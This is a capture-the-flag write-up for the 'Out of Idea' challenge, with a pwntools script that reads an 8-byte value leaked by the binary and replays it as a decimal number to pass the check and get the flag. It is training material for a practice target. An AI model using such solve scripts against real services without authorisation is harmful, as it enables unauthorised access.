# Out of Idea

![](https://i.imgur.com/88hVCe0.png)

From the decompiled result:

1. In line 22, we can see that it gives 8 bytes of v11 to us.
2. Then we can see that it uses strcmp to compare the user input with the unsigned long v11; if the check passes, we get the flag.

The solution is very simple: just read the 8 bytes from stdin and replay them. The script below unpacks those 8 bytes as a 64-bit integer and sends that number back as a decimal string.

```python
from pwn import *

TARGET = './out_of_idea'
HOST = 'chal.ctf.polyufyp.com'
PORT = 25003
context.arch = 'amd64' # i386/amd64
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
elf = ELF(TARGET)

if len(sys.argv) > 1 and sys.argv[1] == 'remote':
    p = remote(HOST, PORT)
    # libc = ELF('')
else:
    p = process(TARGET)
    libc = elf.libc

gdbscript = ''''''

if len(sys.argv) > 1 and sys.argv[1] == 'gdb':
    gdb.attach(p, gdbscript=gdbscript)

#--- helper functions
s = lambda data :p.send(data) #in case that data is an int
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
r = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
# misc functions
uu32 = lambda data :u32(data.ljust(4, b'\x00'))
uu64 = lambda data :u64(data.ljust(8, b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
#---

payload = b""
ru(b"Welcome to out of idea!\n")
leak = r(8)
num = uu64(leak)
print(hex(num))
sl(str(num))

p.interactive()
```